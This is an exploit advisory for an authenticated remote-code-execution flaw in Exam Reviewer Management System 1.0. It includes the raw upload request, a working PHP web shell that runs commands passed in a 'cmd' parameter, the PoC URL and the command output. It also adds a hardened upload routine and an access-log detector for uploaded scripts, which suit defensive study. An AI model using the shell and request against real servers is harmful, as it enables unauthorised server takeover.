Exam reviewer management system 1.0 remote code execution (rce) (authenticated) Vulnerability / Exploit


Exploits / Vulnerability Discovered : 2022-02-09 | Type : webapps | Platform : php
This exploit / vulnerability Exam reviewer management system 1.0 remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-02-08
# Exploit Author: Juli Agarwal(@agarwaljuli)
# Vendor Homepage:

# Software Link:

# Version: 1.0
# Tested on: XAMPP, Kali Linux

Description – The application is vulnerable to remote code execution through the
admin panel. The user profile form (`classes/Users.php?f=save`) accepts an arbitrary
file in its `img` field without checking the type or extension, so an authenticated
attacker can upload a PHP web shell as a "profile image" and then request it from the
web-accessible `uploads/` directory to execute commands on the server.
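The fix on the application side is to stop trusting the client-supplied filename and Content-Type of the `img` part. The following is an added example of a hardened profile-image upload routine, not the ERMS project's own code: the field name `img` and the `uploads/` directory come from the advisory, while the function name `saveProfileImage`, its signature and the surrounding wiring are assumptions.

```php
<?php
// Added example (not the ERMS project's own code): a hardened profile-image
// upload routine. Field name "img" and the uploads directory are taken from
// the advisory; the function name, signature and calling code are assumptions.

declare(strict_types=1);

// Only image types are accepted, and the stored extension is chosen from this
// map, never from the uploaded filename.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_BYTES = 2 * 1024 * 1024;

/**
 * Validate an uploaded profile image and store it under a server-chosen name.
 * Returns the stored file name; throws RuntimeException on any failure.
 */
function saveProfileImage(array $file, string $uploadDir): string
{
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Determine the type from the file contents, not from the client's
    // filename ("shell.php") or Content-Type ("application/x-php").
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('unsupported type: ' . var_export($mime, true));
    }
    // Second check: the bytes must actually parse as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // Server-chosen, unpredictable name with an allowlisted extension, so the
    // original name, extension and timestamp-based naming are never reused.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $name;
}

// Hypothetical wiring inside the save handler:
try {
    $stored = saveProfileImage($_FILES['img'] ?? [], __DIR__ . '/../uploads');
    // persist $stored in the users table instead of the client-supplied filename
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'invalid image';
}
```

Content sniffing alone is not sufficient (a valid GIF can carry PHP in its trailing bytes), which is why the stored extension is forced from the allowlist; as defence in depth, the `uploads/` directory should also be served without script execution (for example, by disabling the PHP handler for that directory in the web server configuration) so that nothing placed there can ever run as code.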



# Request:

POST /erms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
Content-Length: 1004
Origin: http://localhost
Connection: close
Referer: http://localhost/erms/admin/?page=user
Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a

Content-Disposition: form-data; name="id"

Content-Disposition: form-data; name="firstname"

Content-Disposition: form-data; name="lastname"

Content-Disposition: form-data; name="username"

Content-Disposition: form-data; name="password"

Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php

<b>Remote code execution: </b><br><pre>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>


# Webshell access via:

POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id

# Webshell response:

Remote code execution:

uid=1(daemon) gid=1(daemon) groups=1(daemon)
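From the defender's side, the PoC URL above gives a concrete detection pattern: a request for a script file inside the application's `uploads/` directory. The following is an added example, not part of the advisory, that scans web-server access-log lines for that pattern; the log lines are constructed for the example, the uploads path comes from the PoC URL, and the function names are assumptions.

```php
<?php
// Added example (not part of the advisory): flag access-log requests for
// script files under the application's uploads directory. The sample log
// lines below are constructed; the uploads path is taken from the PoC URL.

declare(strict_types=1);

const UPLOAD_PATH = '/erms/uploads/';
const SCRIPT_EXTS = ['php', 'phtml', 'phar', 'php3', 'php5', 'php7'];

/**
 * Parse one combined-format line into ['ip', 'method', 'path', 'status'].
 * Returns null for lines that do not match the format.
 */
function parseLine(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'method' => $m[2], 'path' => $m[3], 'status' => (int) $m[4]];
}

/**
 * True when the request path points at a script file inside uploads/.
 * The query string (e.g. ?cmd=id) is stripped first so only the file
 * extension of the path component is inspected.
 */
function isUploadedScriptRequest(string $path): bool
{
    $component = parse_url($path, PHP_URL_PATH);
    if (!is_string($component)) {
        return false;
    }
    $clean = strtolower($component);
    if (strpos($clean, UPLOAD_PATH) !== 0) {
        return false;
    }
    return in_array(pathinfo($clean, PATHINFO_EXTENSION), SCRIPT_EXTS, true);
}

/** Return the parsed records that match the uploaded-script pattern. */
function findSuspicious(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $rec = parseLine($line);
        if ($rec !== null && isUploadedScriptRequest($rec['path'])) {
            $hits[] = $rec;
        }
    }
    return $hits;
}

// Constructed sample: the save request, the web-shell hit, and a benign image.
$sample = [
    '10.0.0.5 - - [09/Feb/2022:10:19:00 +0000] "POST /erms/classes/Users.php?f=save HTTP/1.1" 200 45',
    '10.0.0.5 - - [09/Feb/2022:10:19:07 +0000] "GET /erms/uploads/1644334740_shell.php?cmd=id HTTP/1.1" 200 98',
    '10.0.0.9 - - [09/Feb/2022:10:20:01 +0000] "GET /erms/uploads/1644334802_avatar.png HTTP/1.1" 200 51200',
];

foreach (findSuspicious($sample) as $hit) {
    printf("ALERT %s %s %s (%d)\n", $hit['ip'], $hit['method'], $hit['path'], $hit['status']);
}
```

Run against the sample, only the second line is reported. A 200 response to such a request is the strongest signal, since it means the server executed the file; a 404 on the same path is still worth correlating with a preceding POST to `classes/Users.php?f=save` from the same client, as that pairing is the upload-then-execute sequence the advisory describes.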